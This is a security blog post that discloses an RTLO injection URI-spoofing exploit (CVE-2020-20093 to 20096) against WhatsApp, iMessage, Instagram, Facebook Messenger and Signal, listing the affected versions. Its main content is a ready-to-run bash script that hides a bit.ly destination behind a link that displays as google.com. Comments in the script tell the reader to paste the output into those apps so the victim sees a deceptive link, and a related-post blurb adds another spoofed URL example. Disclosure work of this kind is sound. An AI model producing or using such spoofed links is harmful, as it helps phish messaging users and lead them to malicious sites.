• Home
  • Releases
  • Submit Vuln
  • Press
  • About
  • PGP
  • Contact
    • Contact
    • Submit Vuln
    • VDP
  • Tutorials
    • All Posts
    • Photoshop on Linux
    • macOS on Linux
  • Supporters
  • Projects
Sick Codes - Security Research, Hardware & Software Hacking, Consulting, Linux, IoT, Cloud, Embedded, Arch, Tweaks & Tips!
  • Home
  • Releases
  • Submit Vuln
  • Press
  • About
  • PGP
  • Contact
    • Contact
    • Submit Vuln
    • VDP
  • Tutorials
    • All Posts
    • Photoshop on Linux
    • macOS on Linux
  • Supporters
  • Projects
No Result
View All Result
Sick Codes - Security Research, Hardware & Software Hacking, Consulting, Linux, IoT, Cloud, Embedded, Arch, Tweaks & Tips!
  • Home
  • Releases
  • Submit Vuln
  • Press
  • About
  • PGP
  • Contact
    • Contact
    • Submit Vuln
    • VDP
  • Tutorials
    • All Posts
    • Photoshop on Linux
    • macOS on Linux
  • Supporters
  • Projects
No Result
View All Result
Sick Codes - Security Research, Hardware & Software Hacking, Consulting, Linux, IoT, Cloud, Embedded, Arch, Tweaks & Tips!
No Result
View All Result
Home Security

Exploit: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096

by Sick Codes
March 24, 2022
in Security
8
# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version  2.19.80 and below
# Tested on: Whatsapp Android 
# Version  2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android 
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096


#!/bin/bash
# Author:       sickcodes
# Contact:      https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright:    sickcodes (C) 2022
# License:      GPLv3+

# References:   https://github.com/zadewg/RIUS
#               https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
#               https://sick.codes/sick-2022-40


APPEAR_AS='https://google.com'


DESTINATION='bit.ly/3ixIRwm'


printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"


# copy paste into any of the above apps.
# victim will see a surreptitious link


# works on latest Signal (unpatched)
Next Post
CVE-2022-28345 Spoofed URL Bypass

CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg

CVE-2021-33318 IpMatcher v1.0.4.1 and below for .NET Core 2.0 and .NET Framework 4.5.2. incorrectly validates octal & hexadecimal input data, leading to indeterminate SSRF, LFI, RFI, and DoS vectors.

Sick Codes Hardwear.io Talk 9-10th June 2022

Sick Codes Speaking LIVE in-person @ Hardwear.io USA 9-10th June 2022: Supply Chain Level 0: Grinding Tractors to a Halt - Growing Pains in Agricultural Hardware Security

Comments 8

  1. Pingback: Signal voor iOS kwetsbaar voor uri-spoofing via RTLO-aanval – 12Privacy.nl
  2. Pingback: Signal voor iOS kwetsbaar voor uri-spoofing via RTLO-aanval – Internet Blabla
  3. Pingback: Phishing do WhatsApp, iMessage, Signal usa renderização de URL
  4. Pingback: Truque de renderização de URL habilitado facilita phishing nas principais plataformas de comunicação | PLUGGED NINJA
  5. Pingback: URL rendering trick enabled WhatsApp, Signal, iMessage phishing – Cyber Reports Cybersecurity News & Information
  6. Pingback: URL rendering trick enabled WhatsApp, Signal, iMessage phishing - Digital News Today
  7. Pingback: 启用 URL 渲染技巧 WhatsApp、Signal、iMessage 网络钓鱼-狼安网
  8. Pingback: URL rendering trick enabled WhatsApp, Signal, iMessage phishing - utexta

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

No Result
View All Result
  • Home
  • Releases
  • Submit Vuln
  • Press
  • About
  • PGP
  • Contact
    • Contact
    • Submit Vuln
    • VDP
  • Tutorials
    • All Posts
    • Photoshop on Linux
    • macOS on Linux
  • Supporters
  • Projects

© 2017-2021 Sick.Codes

@sickcodes

@sickcodes

@sickcodes

Discord Server

sickcodes.slack.com

t.me/sickcodeschat

./contact_form